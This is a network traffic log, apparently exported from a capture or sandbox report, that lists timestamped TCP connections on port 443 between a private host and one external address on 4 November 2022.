Nov 4, 2022 19:59:46.653520107 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.653645039 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.654194117 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.654228926 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.707060099 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.708682060 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.708739042 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.710064888 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.710215092 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.714657068 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.714709997 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.714848042 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.714865923 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.714894056 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.757358074 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.757422924 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.757714987 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.757797956 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.757924080 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.776510954 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.776551008 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.776897907 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.776942015 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.779571056 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.779711008 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:46.779874086 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:46.779941082 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.012305021 CET	49734	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.012386084 CET	443	49734	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.171468973 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.171538115 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.171683073 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.172149897 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.172177076 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.220015049 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.221064091 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.221092939 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.223447084 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.223627090 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.228734016 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.228773117 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.228960037 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.228967905 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.229075909 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.262994051 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.263066053 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.263170004 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.263200998 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.263228893 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.263257027 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.279830933 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.279910088 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.280059099 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.280103922 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.280128956 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.282443047 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.282629013 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.282654047 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.282769918 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.282825947 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.528121948 CET	49735	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.528158903 CET	443	49735	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.669894934 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.669971943 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.670100927 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.670685053 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.670721054 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.716299057 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.717789888 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.717861891 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.719347000 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.719504118 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.724776030 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.724823952 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.724955082 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.724967957 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.725086927 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.760520935 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.760565042 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.760760069 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.760808945 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.760893106 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.777239084 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.777293921 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.777534008 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.777580023 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.779920101 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.780070066 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:47.780148983 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.780186892 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.981142998 CET	49736	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:47.981232882 CET	443	49736	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.169167995 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.169246912 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.169766903 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.185154915 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.185226917 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.232196093 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.232970953 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.233012915 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.235243082 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.235377073 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.240421057 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.240439892 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.240581989 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.240590096 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.240695000 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.275078058 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.275116920 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.275198936 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.275229931 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.275254011 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.275300980 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.292212009 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.292257071 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.292310953 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.292332888 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.292354107 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.294431925 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.294538975 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.294563055 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.294593096 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.294632912 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.512140989 CET	49737	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.512188911 CET	443	49737	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.669043064 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.669104099 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.669184923 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.669828892 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.669848919 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.726317883 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.726893902 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.726942062 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.728821039 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.728909016 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.732392073 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.732429981 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.732496023 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.732505083 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.732641935 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.771717072 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.771755934 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.771809101 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.771857977 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.771946907 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.771946907 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.785615921 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.785669088 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.785727978 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.785773039 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.785852909 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.788178921 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.788270950 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.788295984 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.788420916 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:48.788461924 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.965348005 CET	49738	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:48.965406895 CET	443	49738	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.107629061 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.107728958 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.107841969 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.108683109 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.108717918 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.152847052 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.153493881 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.153512955 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.154777050 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.154891968 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.158210993 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.158225060 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.158317089 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.158323050 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.158359051 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.196147919 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.196192026 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.196389914 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.196423054 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.196486950 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.212953091 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.213004112 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.213191032 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.213222980 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.215436935 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.215569973 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.215600014 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.215625048 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.403134108 CET	49739	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.403208971 CET	443	49739	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.560547113 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.560617924 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.560708046 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.561502934 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.561533928 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.608041048 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.609102964 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.609154940 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.610544920 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.610694885 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.618114948 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.618155956 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.618261099 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.618268967 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.618411064 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.655036926 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.655102015 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.655213118 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.655252934 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.655273914 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.655304909 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.672380924 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.672447920 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.672558069 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.672581911 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.672646999 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.674376011 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.674511909 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.674521923 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.674563885 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.674567938 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:49.674616098 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.918694973 CET	49740	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:49.918731928 CET	443	49740	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.081134081 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.081202984 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.081281900 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.081805944 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.081851959 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.138185978 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.138789892 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.138850927 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.140537977 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.140697002 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.144131899 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.144161940 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.144334078 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.144438982 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.144459963 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.179950953 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.180015087 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.180210114 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.180253983 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.180336952 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.196787119 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.196851969 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.197009087 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.197009087 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.197077990 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.199328899 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.199459076 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.199490070 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.200262070 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.200366974 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.387526989 CET	49741	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.387574911 CET	443	49741	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.538748026 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.538840055 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.538968086 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.539465904 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.539501905 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.585751057 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.586504936 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.586580038 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.589479923 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.589701891 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.594614029 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.594661951 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.594841003 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.594861031 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.595284939 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.630085945 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.630109072 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.630300999 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.630336046 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.630414009 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.647336006 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.647370100 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.647459030 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.647479057 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.647511959 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.650396109 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.650461912 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 19:59:50.650494099 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.650528908 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 19:59:50.650577068 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:03.544680119 CET	49742	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:03.544723034 CET	443	49742	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.874099970 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:03.874212980 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.874320030 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:03.875097990 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:03.875133038 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.925787926 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.955672026 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:03.955698013 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.958719015 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.958796978 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:03.962209940 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:03.962233067 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.962354898 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:03.962361097 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.962464094 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.989479065 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.989527941 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.989691019 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:03.989727974 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:03.989792109 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.006288052 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.006354094 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.006517887 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.006548882 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.008857965 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.008991957 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.009005070 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.009066105 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.185400009 CET	49743	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.185441017 CET	443	49743	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.342178106 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.342264891 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.342353106 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.344647884 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.344671965 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.390383959 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.391138077 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.391165972 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.392487049 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.392612934 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.404308081 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.404329062 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.404414892 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.404427052 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.404520988 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.434636116 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.434669971 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.434838057 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.434889078 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.435019016 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.451433897 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.451472044 CET	443	49744	198.51.233.2	192.168.2.7
Nov 4, 2022 20:00:04.451555014 CET	49744	443	192.168.2.7	198.51.233.2
Nov 4, 2022 20:00:04.451595068 CET	443	49744	198.51.233.2	192.168.2.7
